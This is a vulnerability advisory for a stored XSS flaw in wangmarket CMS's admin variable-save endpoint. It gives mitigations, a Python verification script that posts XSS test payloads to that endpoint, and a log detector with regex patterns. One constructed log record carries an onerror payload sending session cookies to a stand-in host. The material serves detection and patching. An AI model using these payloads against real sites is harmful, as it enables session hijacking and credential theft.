CVE-2025-15451

2.4 LOW

📋 TL;DR

This CVE describes a cross-site scripting (XSS) vulnerability in xnx3 wangmarket CMS versions up to and including 4.9. An attacker with access to the admin panel can inject script through the Description parameter of the system variables page, which is saved via the /admin/system/variableSave.do endpoint; when the injected value is rendered in an administrator's browser, the script runs in that session and can be used to hijack it or steal credentials. Exploitation requires authenticated access to the admin endpoint, which is reflected in the low score.

💻 Affected Systems

Products:
  • xnx3 wangmarket
Versions: Up to and including version 4.9
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects systems with the vulnerable /admin/system/variableSave.do endpoint accessible.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

Attackers could steal administrator session cookies, gain full administrative access to the CMS, deface websites, or install backdoors for persistent access.

🟠 Likely Case

Attackers would typically use this to hijack administrator sessions, modify website content, or redirect users to malicious sites.

🟢 If Mitigated

With proper input validation and output encoding, the attack would be prevented, limiting impact to failed exploitation attempts.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploit requires administrator access to the vulnerable endpoint. Public exploit code is available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch is identified. Upgrade to a release later than 4.9 if the vendor publishes one; until then, apply the workarounds below.

🔧 Temporary Workarounds

Input Validation Filter

Applies to: all

Validate the Description parameter server-side and, more importantly, HTML-entity encode the stored value wherever it is rendered (the system variables page and any template that outputs it); output encoding is what actually prevents the script from executing.

Encoding on save in /admin/system/variableSave.do also neutralizes this injection point as a stopgap, but it mangles legitimate characters in stored values and risks double-encoding on pages that already encode their output.

Web Application Firewall (WAF)

Applies to: all

Deploy a WAF with XSS protection rules in front of the admin interface to block obvious payloads.

Rules that only block literal <script> tags or the string "javascript" in the Description parameter are easy to bypass (event-handler attributes such as onerror=, tags such as <img> or <svg>, URL- or entity-encoded payloads), so treat the WAF as a stopgap rather than a fix and do not tune it to a single parameter name.

🧯 If You Can't Patch

  • Restrict access to the admin interface, including /admin/system/variableSave.do, by network ACL or VPN so that only trusted administrator addresses can reach it; the exploit requires admin access, so limiting who can authenticate limits who can plant a payload
  • Send a Content Security Policy header that disallows inline script (no 'unsafe-inline' in script-src); this constrains what an injected payload can do but does not remove the injection

🔍 How to Verify

Check if Vulnerable:

Treat any xnx3 wangmarket installation at version 4.9 or earlier as vulnerable, since no fixed release is identified; confirm the installed version from the admin panel or the deployment's version file.

Check Version:

Check version.txt file or admin dashboard for version information

Verify Fix Applied:

On a test instance, save a Description value such as <script>alert('test')</script> (and a less obvious one such as an <img> tag with an onerror handler), then open the system variables page and inspect the raw HTML source. The fix is in place only if the value appears entity-encoded (&lt;script&gt;...) rather than as live markup. Do not rely on the alert dialog alone: a CSP or browser filter can suppress it while the markup is still injected.
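The check above, as an added example that is not code from the advisory or the wangmarket project. The pure function classify_reflection() decides from raw HTML whether a test value came back as live markup, entity-encoded, altered by a filter, or absent; the optional check_live() part posts each payload and fetches the render page, and assumes things the advisory does not state: a url-encoded form with a field named Description, a session cookie you already hold, and a hypothetical RENDER_PATH for the page that displays the saved value. It also tests two payloads beyond the advisory's literal <script> tag, since a filter that blocks only that tag would otherwise look like a fix.

```python
"""Verification helper for CVE-2025-15451 (xnx3 wangmarket <= 4.9, XSS via Description).

Added example; not code from the advisory or the wangmarket project.
classify_reflection() decides from raw HTML whether a test value came back as
live markup (vulnerable), entity-encoded (fixed), altered (a filter rewrote
it) or absent.  check_live() is optional and makes ASSUMPTIONS the advisory
does not state: the form is sent url-encoded with a field named Description,
authentication is a session cookie you already hold, and RENDER_PATH is the
page that displays the saved value.
"""
from __future__ import annotations

import html
import sys
import urllib.parse
import urllib.request

SAVE_PATH = "/admin/system/variableSave.do"   # endpoint named in the advisory
RENDER_PATH = "/admin/system/variable.do"      # ASSUMPTION: adjust to the page that shows the value
MARKER = "cve-2025-15451-check"                # unique token so the value can be located in the page

# One payload per filter style: the literal <script> the advisory names, plus
# two that pass a filter which only blocks that tag.
PAYLOADS = {
    "script_tag": "<script>alert('%s')</script>" % MARKER,
    "img_onerror": "<img src=x onerror=\"alert('%s')\">" % MARKER,
    "svg_onload": "<svg onload=alert('%s')>" % MARKER,
}


def encoded_forms(payload: str) -> list[str]:
    """Entity-encoded renderings a correct fix may produce.  html.escape emits
    &#x27; for a single quote; other encoders emit &#39; or leave quotes alone."""
    base = html.escape(payload, quote=True)
    return [base, base.replace("&#x27;", "&#39;"), html.escape(payload, quote=False)]


def classify_reflection(page_html: str, payload: str, marker: str = MARKER) -> str:
    """'raw' = live markup (vulnerable); 'encoded' = entity-encoded (fixed);
    'altered' = marker present but markup rewritten (sanitizer or WAF in the way);
    'absent' = value not on this page (wrong RENDER_PATH, or the save was rejected)."""
    if payload in page_html:
        return "raw"
    if any(form in page_html for form in encoded_forms(payload)):
        return "encoded"
    if marker in page_html:
        return "altered"
    return "absent"


def verdict(results: dict[str, str]) -> str:
    """One raw reflection is enough to call the instance vulnerable; every
    payload must come back encoded before calling it fixed."""
    if any(r == "raw" for r in results.values()):
        return "VULNERABLE"
    if results and all(r == "encoded" for r in results.values()):
        return "FIXED"
    return "INCONCLUSIVE"


def check_live(base_url: str, cookie: str, extra_fields: dict | None = None) -> dict[str, str]:
    """Save each payload through the admin endpoint, fetch the render page and
    classify it.  Run only against an instance you are authorized to test;
    the stored value is left behind, so clean it up afterwards."""
    results = {}
    for name, payload in PAYLOADS.items():
        fields = dict(extra_fields or {})   # ASSUMPTION: the real form has more fields; pass them in
        fields["Description"] = payload
        data = urllib.parse.urlencode(fields).encode()
        req = urllib.request.Request(base_url + SAVE_PATH, data=data, headers={"Cookie": cookie})
        urllib.request.urlopen(req, timeout=10).read()
        req = urllib.request.Request(base_url + RENDER_PATH, headers={"Cookie": cookie})
        page = urllib.request.urlopen(req, timeout=10).read().decode("utf-8", "replace")
        results[name] = classify_reflection(page, payload)
    return results


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: verify_cve_2025_15451.py https://cms.example 'JSESSIONID=...'")
    outcome = check_live(sys.argv[1].rstrip("/"), sys.argv[2])
    for name, result in outcome.items():
        print(f"{name}: {result}")
    print("verdict:", verdict(outcome))
```

An "altered" result is the interesting middle case: the marker survived but the tags did not, which usually means a WAF or sanitizer is rewriting the value rather than the application encoding it on output, so the underlying code is still unfixed.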

📡 Detection & Monitoring

Log Indicators:

  • POST requests to /admin/system/variableSave.do whose Description parameter contains markup: script tags, javascript: URIs or on*= event handlers, possibly URL-encoded
  • Failed login attempts against the admin interface followed by a successful login from the same source, which would indicate an attacker obtaining the admin access the exploit requires

Network Indicators:

  • HTTP POST bodies to the vulnerable endpoint containing <script> tags, their URL-encoded form (%3Cscript%3E), or event-handler attributes

SIEM Query:

source="web_logs" AND uri_path="/admin/system/variableSave.do" AND (request_body CONTAINS "<script>" OR request_body CONTAINS "javascript:")

This is pseudo-syntax; adapt it to your SIEM. It matches only literal payloads, so URL-decode request_body first (or also match "%3Cscript") and add event-handler patterns. Most web servers do not log POST bodies by default, so the request_body field will only exist if a WAF or reverse proxy records them.
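The query above as runnable detection logic, added here as an example and not taken from the advisory or the wangmarket project. It goes beyond the query in two ways: every form parameter is URL-decoded a second time (to catch double encoding) and entity-decoded before matching, and event-handler attributes, javascript: URIs and active tags such as <img> or <svg> are flagged alongside the literal <script> tag. The log records are constructed JSON lines with assumed field names, not real traffic.

```python
"""Detection of CVE-2025-15451 exploitation attempts in web or WAF logs.

Added example; not from the advisory or the wangmarket project.  It is the
advisory's SIEM query written as code, extended in two ways: each form
parameter is URL-decoded (a second time, to catch double encoding) and
entity-decoded before matching, and event-handler attributes, javascript:
URIs and active tags such as <img>/<svg> are flagged alongside literal
<script>.  The records below are CONSTRUCTED, not real traffic; the field
names are assumed, and request_body only exists if a WAF or reverse proxy
logs bodies, which most web servers do not do by default.
"""
import html
import json
import re
import urllib.parse

TARGET_PATH = "/admin/system/variableSave.do"   # endpoint named in the advisory

# Checked against each decoded parameter value, in this order.
XSS_PATTERNS = [
    ("script_tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("javascript_uri", re.compile(r"javascript\s*:", re.I)),
    ("event_handler", re.compile(r"\bon(error|load|click|mouseover|focus|mouseenter|pageshow|toggle)\s*=", re.I)),
    ("active_tag", re.compile(r"<\s*(img|svg|iframe|object|embed|math|details)\b", re.I)),
]


def decode_value(value: str) -> str:
    """parse_qs already URL-decoded once; a second unquote catches %253C-style
    double encoding and html.unescape catches &lt;script&gt; smuggled as entities."""
    return html.unescape(urllib.parse.unquote(value))


def find_xss(body: str) -> list:
    """(parameter, pattern_name) pairs for every XSS-looking value in a
    url-encoded form body; an empty list means nothing matched."""
    hits = []
    for param, values in urllib.parse.parse_qs(body, keep_blank_values=True).items():
        for value in values:
            text = decode_value(value)
            for name, rx in XSS_PATTERNS:
                if rx.search(text) and (param, name) not in hits:
                    hits.append((param, name))
    return hits


def scan_logs(lines, target_path: str = TARGET_PATH) -> list:
    """One alert per JSON record that is a POST to target_path with a
    suspicious body.  The path filter mirrors the advisory's query; widen it
    to the whole /admin/ tree to catch the same payloads on other forms."""
    alerts = []
    for line in lines:
        rec = json.loads(line)
        if rec.get("method") != "POST" or rec.get("uri_path") != target_path:
            continue
        hits = find_xss(rec.get("request_body", ""))
        if hits:
            alerts.append({"ts": rec["ts"], "src_ip": rec["src_ip"],
                           "user": rec.get("user"), "hits": hits})
    return alerts


# CONSTRUCTED sample records (field names assumed): one benign save, four
# attempts in different encodings, one benign value containing "<" and "online",
# and a GET that should be ignored.
SAMPLE_LOGS = [
    '{"ts":"2025-01-10T09:00:01Z","src_ip":"10.0.0.5","user":"admin","method":"POST","uri_path":"/admin/system/variableSave.do","request_body":"name=site_title&Description=Company+homepage"}',
    '{"ts":"2025-01-10T09:05:14Z","src_ip":"203.0.113.7","user":"editor","method":"POST","uri_path":"/admin/system/variableSave.do","request_body":"name=footer&Description=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E"}',
    '{"ts":"2025-01-10T09:06:30Z","src_ip":"203.0.113.7","user":"editor","method":"POST","uri_path":"/admin/system/variableSave.do","request_body":"name=footer&Description=%3Cimg+src%3Dx+onerror%3Dfetch%28%27https%3A%2F%2Fexample.invalid%2F%27%2Bdocument.cookie%29%3E"}',
    '{"ts":"2025-01-10T09:07:02Z","src_ip":"203.0.113.7","user":"editor","method":"POST","uri_path":"/admin/system/variableSave.do","request_body":"name=footer&Description=%3Ca+href%3D%22javascript%3Aalert%281%29%22%3Eclick%3C%2Fa%3E"}',
    '{"ts":"2025-01-10T09:08:45Z","src_ip":"203.0.113.7","user":"editor","method":"POST","uri_path":"/admin/system/variableSave.do","request_body":"name=footer&Description=%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E"}',
    '{"ts":"2025-01-10T09:10:00Z","src_ip":"10.0.0.5","user":"admin","method":"POST","uri_path":"/admin/system/variableSave.do","request_body":"name=promo&Description=Orders+%3C+10+%26+online+pickup"}',
    '{"ts":"2025-01-10T09:11:00Z","src_ip":"203.0.113.7","user":"editor","method":"GET","uri_path":"/admin/system/variableSave.do","request_body":""}',
]

if __name__ == "__main__":
    for alert in scan_logs(SAMPLE_LOGS):
        print(json.dumps(alert))
```

Of the four flagged records, only the first would be caught by the literal "<script>" query; the onerror, javascript: and double-encoded variants need the decoding and the extra patterns. The benign "Orders < 10 & online pickup" value shows why the event-handler pattern is restricted to a list of attribute names rather than any on*= token.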

🔗 References
